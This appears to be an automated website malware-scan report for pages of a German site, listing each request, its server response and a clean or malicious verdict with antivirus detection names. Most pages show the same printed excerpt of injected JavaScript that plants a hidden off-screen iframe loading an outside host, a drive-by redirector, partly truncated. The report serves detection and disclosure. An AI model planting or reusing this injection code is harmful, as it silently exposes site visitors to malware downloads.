Request | Server response | Status |
http://www.harald.web123.eu/ | 200 OK Content-Length: 10947 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/res/x5engine.js | 200 OK Content-Length: 55044 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.he
... 646 bytes are skipped ...= document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}
Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://m1.webstats.motigo.com/c.js?id=2656232&lang=DE&i=27 | HTTP/1.1 302 Found Connection: close Date: Mon, 31 Mar 2014 10:28:09 GMT Location: http://m1.webstats.motigo.com:80/c.js?id=2656232&r=1&i=27&country=lt&_t=1396261689&cat=&is=webstats Server: Apache Content-Type: text/html; charset=iso-8859-1 P3P: policyref="http://webstats.motigo.com/w3c/p3p.xml", CP="NON DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: w4u_tu=1396261689,0,0; expires=Tue, 01-Apr-2014 11:28:09 GMT
| clean |
http://m1.webstats.motigo.com:80/c.js?id=2656232&r=1&i=27&country=lt&_t=1396261689&cat=&is=webstats | 200 OK Content-Length: 3995 Content-Type: application/x-javascript | clean |
http://www.harald.web123.eu/index.html | 200 OK Content-Length: 10947 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/foren_allgemein.html | 200 OK Content-Length: 10382 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/unsere_foren.html | 200 OK Content-Length: 10589 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://radio.at/info/player/player.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://www.harald.web123.eu/faq.html | 200 OK Content-Length: 14170 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/aktuelles.html | 200 OK Content-Length: 12522 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/kaspersky.html | 200 OK Content-Length: 10203 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/alles_auf_einen_blick.html | 200 OK Content-Length: 12992 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/communicate.html | 200 OK Content-Length: 9934 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/die_technik.html | 200 OK Content-Length: 10783 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/studio.html | 200 OK Content-Length: 10822 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.harald.web123.eu/herzlich_willkommen_bei_studio_enns_-_die_wahre_m.html | 200 OK Content-Length: 10878 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function pedhr09() {
var static='ajax';
var controller='index.php';
var pedhr = document.createElement('iframe');
pedhr.src = 'http://mar-berlin.de/debug.php';
pedhr.style.position = 'absolute';
pedhr.style.color = '18';
pedhr.style.height = '18px';
pedhr.style.width = '18px';
pedhr.style.left = '100018';
pedhr.style.top = '100018';
if (!document.getElementById('pedhr')) {
document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>');
document.getElementById('pedhr').appen
... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
pedhr09();
}
}Antivirus reports:- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- Emsisoft
- JS:Trojan.Script.CIV (B)
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan.JS.Redirector.zv
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|